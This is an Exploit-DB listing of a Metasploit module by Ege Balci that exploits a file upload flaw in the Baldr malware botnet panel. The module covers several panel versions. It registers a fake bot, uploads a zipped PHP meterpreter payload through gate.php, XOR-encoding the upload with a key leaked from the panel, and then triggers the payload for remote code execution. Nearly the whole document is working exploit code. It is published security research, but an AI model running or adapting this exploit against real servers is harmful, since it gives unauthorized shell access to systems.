Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)

EDB-ID:

47215

CVE:

N/A

EDB Verified:

Author:

Ege Balci

Type:

remote

Exploit:   /  

Platform:

PHP

Date:

2019-08-08

Vulnerable App: 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/http'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Baldr Botnet Panel Shell Upload Exploit",
      'Description'    => %q{
        This module exploits the file upload vulnerability of baldr malware panel.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Ege Balcı <ege.balci@invictuseurope.com>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://prodaft.com']
        ],
      'DefaultOptions'  =>
        {
          'SSL' => false,
          'WfsDelay' => 5,
        },
      'Platform'       => ['php'],
      'Arch'           => [ ARCH_PHP],
      'Targets'        =>
        [
          ['Auto',
            {
              'Platform' => 'PHP',
              'Arch' => ARCH_PHP,
              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
            }
          ],
          ['Baldr <= v2.0',
            {
              'Platform' => 'PHP',
              'Arch' => ARCH_PHP,
              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
            }
          ],
          ['Baldr v2.2',
            {
              'Platform' => 'PHP',
              'Arch' => ARCH_PHP,
              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
            }
          ],
          ['Baldr v3.0 & v3.1',
            {
              'Platform' => 'PHP',
              'Arch' => ARCH_PHP,
              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Dec 19 2018",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the baldr gate', '/']),
      ]
    )
  end

  def check 
    res = send_request_cgi(
      'method'    => 'GET',
      'uri'       => normalize_uri(target_uri.path,"/gate.php")
    )

    ver = ''

    if res.code == 200
      if res.body.include?('~;~')
        targets[3] = targets[0]
        #target = targets[3]
        ver = '>= v3.0'
      elsif res.body.include?(';')
        #target = targets[2]
        targets[2] = targets[0]
        ver = 'v2.2'
      elsif res.body.size < 4
        targets[1] = targets[0]
        #target = targets[1]
        ver = '<= v2.0'
      else
        Exploit::CheckCode::Safe  
      end
      print_status("Baldr verison: #{ver}")
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit

    name = '.'+Rex::Text.rand_text_alpha(4)
    files =
    [
      {data: payload.encoded, fname: "#{name}.php"}
    ]
    zip = Msf::Util::EXE.to_zip(files) 
    hwid = Rex::Text.rand_text_alpha(8).upcase

    if targets[0]
      check
    end


    case target
    when targets[3]
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path,"/gate.php")}
      )
      key = res.body.to_s.split('~;~')[0]
      print_good("Key: #{key}")

      data = "hwid=#{hwid}&os=Windows 10 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v3.0"
      data = xor(data,key)

      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path,"/gate.php"),
        'data'  => data.to_s
        }
      )

      if res.code == 200
        print_good("Bot successfully registered.")
      else
        print_error("New bot register failed !")
        return false
      end

      data = xor(zip.to_s,key)
      form = Rex::MIME::Message.new
      form.add_part(data.to_s, 'application/octet-stream', 'binary', "form-data; name=\"file\"; filename=\"file.zip\"")

      res = send_request_cgi(
        'method'    => 'POST',
        'uri'       => normalize_uri(target_uri.path,"/gate.php"),
        'ctype'     => "multipart/form-data; boundary=#{form.bound}",
        'data'      => form.to_s
      )
      if res && (res.code == 200 ||res.code == 100)
        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
      else
        print_error("Server responded with code #{res.code}") if res
        print_error("Failed to upload payload.")
        return false
      end

    when targets[2]
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path,"/gate.php")}
      )
      key = res.body.to_s.split(';')[0]
      print_good("Key: #{key}")
      data = "hwid=#{hwid}&os=Windows 7 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v2.2***"
      data << zip.to_s
      
      result = ""
      codepoints = data.each_codepoint.to_a
      codepoints.each_index do |i|
          result += (codepoints[i] ^ key[i % key.size].ord).chr
      end

      res = send_request_cgi(
        'method'    => 'POST',
        'uri'       => normalize_uri(target_uri.path,"/gate.php"),
        'data'      => result.to_s
      )
      if res && (res.code == 200 ||res.code == 100)
        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
      else
        print_error("Server responded with code #{res.code}") if res
        print_error("Failed to upload payload.")
        return false
      end
    else
      res = send_request_cgi(
        'method'    => 'POST',
        'uri'       => normalize_uri(target_uri.path,"/gate.php"),
        'data'      => zip.to_s,
        'encode_params' => true,
        'vars_get'  => {
          'hwid'  => hwid,
          'os'  => 'Windows 7 x64',
          'cookie'  => '0',
          'pswd'  => '0',
          'credit'  => '0',
          'wallet'  => '0',
          'file'  => '1',
          'autofill'  => '0',
          'version'  => 'v2.0'
        }
      )

      if res && (res.code == 200 ||res.code == 100)
        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
      else
        print_error("Server responded with code #{res.code}") if res
        print_error("Failed to upload payload.")
        return false
      end
    end


    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path,"/logs/#{hwid}/#{name}.php")}, 3
    )
    
    print_good("Payload successfully triggered !")
  end

  def xor(data, key)
    result = ""
    codepoints = data.each_codepoint.to_a
    codepoints.each_index do |i|
        result += (codepoints[i] ^ key[i % key.size].ord).chr
    end
    return result
  end


end
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services